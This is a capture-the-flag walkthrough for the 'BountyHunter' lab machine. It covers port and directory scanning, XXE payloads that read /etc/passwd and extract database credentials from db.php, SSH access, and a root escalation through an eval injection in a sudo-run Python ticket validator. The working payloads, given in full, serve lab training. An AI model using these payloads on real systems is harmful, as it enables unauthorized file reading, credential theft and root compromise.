Recon:
nmap -sT -sV -v <bountyhunter ip>. Only relevant information are open ports: 22, 80.
gobuster dir -x .php,.txt,.html -u <bountyhunter ip> -w <path/to/dict>. Relevant files: "db.php", "portal.php" (which can be found via the homepage menu).
Checkout the homepage, click "portal" through the menu, then click "here" to go to "Bounty Report System".
XXE Exploit:
The web app is vulnerable to a simple XXE attack. Encode the following data in base64, then once more in URL encoding. Passing the resulting string as a POST parameter named "data" to the file "tracker_diRbPr00f314.php" results in the page dumping the contents of "/etc/passwd":
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE hack [<!ENTITY mike SYSTEM "file:///etc/passwd">]>
<bugreport>
<title>&mike;</title>
</bugreport>
Through this file we find the "development" user.
Getting User:
Using the same exploit, but a different payload, allows us to extract the contents of the previously discovered "db.php" file:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE hack [<!ENTITY mike SYSTEM "php://filter/convert.base64-encode/resource=db.php">]>
<bugreport>
<title>&mike;</title>
</bugreport>
Now decode the returned base64 to retrieve a password. This password is used to ssh into the server using the previously obtained "development" username. cat user.txt prints the user flag.
Getting Root:
ls shows a file "contract.txt", whos contents indicate that we have "permissions" to test a specific tool. Using sudo -l shows us the tool's path and that we can run it as sudo using python 3.8. At some point in the code, the tool evaluates a specific line of a user-defined file. This file must adhere to specific rules. The following code can be saved as any name with the extension ".md":
# Skytrain Inc
## Ticket to
__Ticket Code:__
**4+0 and exec('import pty; pty.spawn(\"/bin/bash\")')
NOTE: The "Ticket to" line MUST end with a single space, or the tool will reject the file.
Running the following command and passing it the exploit filename grants you a root shell: sudo python3.8 /opt/skytrain_inc/ticketValidator.py. Print the "root.txt" file's contents to get the root flag.
Date created: 2021.08.20